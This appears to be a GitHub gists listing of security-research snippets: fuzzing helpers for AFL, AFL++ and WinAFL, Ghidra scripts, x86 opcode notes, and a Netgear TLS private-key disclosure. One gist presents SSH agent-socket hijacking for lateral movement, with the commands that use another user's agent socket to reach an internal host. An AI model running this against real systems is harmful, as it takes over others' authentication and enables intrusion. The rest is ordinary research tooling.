Skip to content

Instantly share code, notes, and snippets.

View domenukk's full-sized avatar
🦥

Dominik Maier domenukk

🦥
290 followers · 201 following
  • GER
View GitHub Profile
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@moyix
moyix / README.txt
Created October 26, 2020 01:14
Recover edge information from afl-showmap
If you have a list of edge hashes produced by AFL (e.g. from something like this):
./afl-showmap -o foo.edges -t 500 -q -e -- ./program arg1
Re-run the program using gdb to trace the sequence of block IDs:
./collect_coverage.sh trace.txt ./program arg1
Print edges in the trace:
@nstarke
nstarke / netgear-private-key-disclosure.md
Last active April 30, 2024 06:02
Netgear TLS Private Key Disclosure through Device Firmware Images

Netgear Signed TLS Cert Private Key Disclosure

Overview

There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.

These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.

The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.

@andreafioraldi
andreafioraldi / neg_int_feedback.diff
Last active October 23, 2019 19:05
An example of a domain-specific custom coverage for AFL++ QEMU mode. This patch hooks functions calls and give feedbacks to the fuzzer if an argument of the function (the first 4 are considered in this naive example) is not a pointer and is a negative integer (can be both a 32 bit negative or a 64 bit negative).
diff --git a/accel/tcg/tcg-runtime.c b/accel/tcg/tcg-runtime.c
index d0d44844..d10d51ce 100644
--- a/accel/tcg/tcg-runtime.c
+++ b/accel/tcg/tcg-runtime.c
@@ -167,3 +167,29 @@ void HELPER(exit_atomic)(CPUArchState *env)
{
cpu_loop_exit_atomic(ENV_GET_CPU(env), GETPC());
}
+
+
@richinseattle
richinseattle / LaunchWinAFL.java
Last active September 24, 2021 02:24
// Launch WinAFL with current function as hook location
//@author richinseattle
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
// Usage:
// Install DynamoRIO and WinAFL
// Add LaunchWinAFL to Ghidra scripts
@guedou
guedou / GhidraDecompiler.java
Last active March 3, 2022 10:39
Call the Ghidra decompiler from the command line
// Copyright (C) 2019 Guillaume Valadon <guillaume@valadon.net>
// This program is published under a GPLv2 license
/*
* Decompile a function with Ghidra
*
* analyzeHeadless . Test.gpr -import $BINARY_NAME -postScript GhidraDecompiler.java $FUNCTION_ADDRESS -deleteProject -noanalysis
*
*/
@seanjensengrey
seanjensengrey / octal_x86.txt
Created April 1, 2018 16:28
x86 is an octal machine
# source:http://reocities.com/SiliconValley/heights/7052/opcode.txt
From: mark@omnifest.uwm.edu (Mark Hopkins)
Newsgroups: alt.lang.asm
Subject: A Summary of the 80486 Opcodes and Instructions
(1) The 80x86 is an Octal Machine
This is a follow-up and revision of an article posted in alt.lang.asm on
7-5-92 concerning the 80x86 instruction encoding.
The only proper way to understand 80x86 coding is to realize that ALL 80x86
@brandonprry
brandonprry / afl-ptmin.sh
Last active March 15, 2023 11:44
Parallelize afl-tmin to use multiple cores
#!/bin/bash
cores=$1
inputdir=$2
outputdir=$3
pids=""
total=`ls $inputdir | wc -l`
for k in `seq 1 $cores $total`
do